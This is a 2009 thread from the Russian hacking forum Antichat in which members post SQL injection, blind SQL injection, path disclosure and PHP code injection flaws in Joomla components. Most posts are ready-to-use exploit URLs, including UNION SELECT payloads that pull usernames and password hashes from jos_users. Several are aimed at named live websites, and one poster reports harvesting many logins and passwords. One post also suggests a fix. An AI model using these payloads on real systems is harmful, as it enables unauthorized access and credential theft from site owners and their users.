Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
06.11.2009, 17:43
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Уязвимость: SQL-Inj
Компонент: DJ Catalog
Версия: 1.0.4
Требования: magic_quotes_gpc = off
Файл: /components/com_djcatalog/models/show.php
PHP код:
function getAllElements(){
global $mainframe;
$par =& $mainframe->getParams('com_djcatalog');
$limit = $par->get('limit_items_show');
$limitstart = JRequest::getVar('limitstart', 0, '', 'int');
$producer_id = JRequest::getVar('pid', 0, '', 'int');
$search = '';
if(JRequest::getVar('search','0','string')!='0'){
$search = " AND name LIKE '%".JRequest::getVar('search','0','string')."%' ";
}
$producer = '';
if($producer_id){
$producer = ' AND producer_id LIKE '.$producer_id. '';
}
$order = JRequest::getVar('order');
$db= &JFactory::getDBO();
switch ($order) { ... }
$query = "SELECT * FROM #__djcat_items WHERE 1 ".$producer.$search.$orderQuery;
$db->setQuery($query);
$Arows = $this->_getList($query, $limitstart, $limit);
return $Arows;
}
Эксплойт:
Код:
/index.php?option=com_djcatalog&view=show&search='+and+0+union+select+1,2,3,username,5,password,7,8,9,10,11+from+%23__users%23
__________________
включи голову
|
|
|
09.11.2009, 00:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Раскрытие Путей
Компонент : jevents
Код:
index.php?option=com_jevents&task=icalrepeat.detail&evid[]=33&Itemid=0&year=2009&month=11&day=03&uid=d3e68405af27abcc1522182b0970abc0
__http://www.ccebc.com/index.php?option=com_jevents&task=icalrepeat.detai l&evid[]=100&Itemid=0&year=2009&month=11&day=11&uid=455d8a d5611ba60fdf1eaab2215e324c&lang=us
сорцов нет, наткнулся просто
Последний раз редактировалось HAXTA4OK; 09.11.2009 в 00:13..
|
|
|
|
09.11.2009, 00:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Уязвимость : SQL
Компонент : com_rsgallery2
Версия : N/A
Код:
index.php?option=com_rsgallery2&Itemid=1&page=inline&id=9&catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--&limitstart=1
__http://etherealangels.com/index.php?option=com_rsgallery2&Itemid=1&page=inli ne&id=9&catid=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12, 13--&limitstart=1
__http://etherealangels.com/index.php?option=com_rsgallery2&Itemid=1&page=inli ne&id=9&catid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13+from+jos_users--&limitstart=1
куча логов и пассов
ЗЫ вроде не видел ни где
Последний раз редактировалось HAXTA4OK; 09.11.2009 в 00:29..
|
|
|
|
09.11.2009, 10:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Раскрытие путей
Компонент : com_jshopping
Код:
index.php?option=com_jshopping&task=product&product_id[]=27&category_id=8&Itemid=7
Код:
index.php?option=com_jshopping&task=product&product_id=27&category_id[]=8&Itemid=7
__http://www.fitofilter.com/index.php?option=com_jshopping&task=product&produc t_id[]=27&category_id=8&Itemid=7
__http://polimobil.md/index.php?option=com_jshopping&task=product&produc t_id=18&category_id[]=11&Itemid=69 |
|
|
|
09.11.2009, 11:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Уязвимость : Blind - SQL
Компонент : com_ci
Код:
index.php?option=com_ci&task=viewCi§or_id=77+and+substring(version(),1,1)=4&m=m&Itemid=1210&send2friend=index.php%3Foption%3Dcom_ci%26task%3DviewCi%26sector_id%3D77%26m%3Dm%26Itemid%3D1210
false: _http://www.hkz.nl/index.php?option=com_ci&task=viewCi§or_id=77+a nd+substring(version(),1,1)=4&m=m&Itemid=1210&send 2friend=index.php%3Foption%3Dcom_ci%26task%3DviewC i%26sector_id%3D77%26m%3Dm%26Itemid%3D1210
True: _http://www.hkz.nl/index.php?option=com_ci&task=viewCi§or_id=77+a nd+substring(version(),1,1)=5&m=m&Itemid=1210&send 2friend=index.php%3Foption%3Dcom_ci%26task%3DviewC i%26sector_id%3D77%26m%3Dm%26Itemid%3D1210 |
|
|
|
09.11.2009, 17:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Уязвимость : Blind - SQL
Компонент : com_acprojects
true : _http://www.artcom.de/index.php?lang=en&option=com_acprojects&id=17+and+ substring(version(),1,1)=4&Itemid=115&page=6
False : _http://www.artcom.de/index.php?lang=en&option=com_acprojects&id=17+and+ substring(version(),1,1)=5&Itemid=115&page=6
Компонент : com_acnews
_http://www.artcom.de/index.php?option=com_acnews&task=view&id=449+and+s ubstring(version(),1,1)=4--&Itemid=136&page=0&lang=en
SQL
Компонент : com_acjobs
_http://www.artcom.de/index.php?option=com_acjobs&Itemid=-120+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17--&lang=en
вывод в title
PS на еще одном не пашут скули =\ мб версия другая))
Последний раз редактировалось HAXTA4OK; 09.11.2009 в 17:21..
|
|
|
|
09.11.2009, 19:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
компонент: com_kunena
версии: качал последние две (Kunena1.5.6, Kunena1.5.5)
file: default/plugin/userlist/userlist.php
Код:
...
$orderby = JRequest::getVar('orderby', 'registerDate');
$direction = JRequest::getVar('direction', 'ASC');
$search = JRequest::getVar('search', '');
...//ещё переменные & формирование 1го $query
if ($search != "") {
$query .= " WHERE (u.name LIKE '%$search%' OR u.username LIKE '%$search%')";
}
$kunena_db->setQuery($query);
$total = $kunena_db->loadResult();
... //определение 2-го $query
if ($search != "")
{
$query .= " WHERE (name LIKE '%$search%' OR username LIKE '%$search%')";
$query_ext .= "&search=" . $search;
}
$query .= " ORDER BY $orderby $direction, id $direction";
... // +limit
$kunena_db->setQuery($query);
...
описание getvar() из класса JRequest здесь
решение:
$search=addslashes(JRequest::getVar('search',''));
для $orderby & $direction использовать switch
эксплуатация:
?search='){inj} //magic_quotes_gps off
?orderby={inj}
?direction=,{inj}
|
|
|
|
29.11.2009, 21:53
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 1
Провел на форуме:
1439
Репутация:
0
|
|
Не я нашел, это с j http://joomla-support.ru/showthread....5180#post75180 соб - сно
Всем привет.
Нашел баг в sh404SEF. плохая фильтрация значений параметров
версия: 1.0.20_Beta - build_237
в админке при сохранении настроек компонента. я спалил на параметре Insert before page title.
если поставить значение например такое:
\"; echo 'test'; "Формос ТК официальный дистрибъютор 3М. то сл. можно выполнить любую функцию в джумле и на php, например вывод значения из configuration.php и т.п. или удаление файлов и т.п.
вообщем такое дело. будьте осторожны! |
|
|
|
05.12.2009, 12:22
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Joomla Joaktree Component v1.0 SQL Injection Vulnerability
Author: Don Tukulesto
Published: 2009-12-01
http://extensions.joomla.org/extensi...genealogy/9842
Version() : 1.0
Vulnerability : SQL injection
http://server/index.php?option=com_joaktree&view=joaktree&treeId =[SQL]
[ Exploit ]
-1+union+select+1,1,1,version(),1,666,1,concat(user name,0x3a,password),1,1,1,1,1,1,1,1+from+jos_users--
|
|
|
|
07.12.2009, 16:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
может кому нить пригодиться последнаяя версия джумла Joomla_1.5.15-Stable-Full_Package.zip
у себя проверил
http://localhost/lastjoom/index.php?limitstart=-5
наш путь:
Warning: Invalid argument supplied for foreach() in Z:\home\localhost\www\lastjoom\components\com_cont ent\models\frontpage.php on line 104
Последний раз редактировалось Strilo4ka; 07.12.2009 в 17:23..
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
